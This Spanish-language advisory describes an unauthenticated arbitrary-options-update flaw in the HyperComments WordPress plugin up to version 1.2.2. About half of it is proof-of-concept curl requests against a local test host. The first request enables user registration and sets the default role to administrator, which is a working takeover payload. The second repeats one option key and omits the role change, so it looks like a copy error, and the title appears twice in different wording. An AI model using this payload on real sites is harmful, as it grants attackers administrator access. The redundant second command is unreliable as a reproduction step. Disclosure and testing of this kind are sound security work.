
HyperComments <= 1.2.2 - Actualización de opciones arbitrarias sin autenticación (Suscriptor+)
HyperComments <= 1.2.2 - Actualización arbitraria de opciones sin autenticar (Subscriber+)
El complemento HyperComments para WordPress es vulnerable a la modificación no autorizada de datos, lo que puede conducir a una escalada de privilegios debido a una falta de comprobación de capacidades en la función hc_request_handler en todas las versiones hasta la 1.2.2 incluida. Esto permite que atacantes no autenticados actualicen opciones arbitrarias en el sitio de WordPress. Esto puede aprovecharse para actualizar el rol predeterminado de registro a administrador y habilitar el registro de usuarios, lo que permite a los atacantes obtener acceso de usuario administrativo a un sitio vulnerable.
curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
-d "data={\"users_can_register\":\"1\",\"default_role\":\"administrator\"}" \
-H "Content-Type: application/x-www-form-urlencoded"
curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
-d "data={\"users_can_register\":\"1\",\"users_can_register\":\"1\"}" \
-H "Content-Type: application/x-www-form-urlencoded"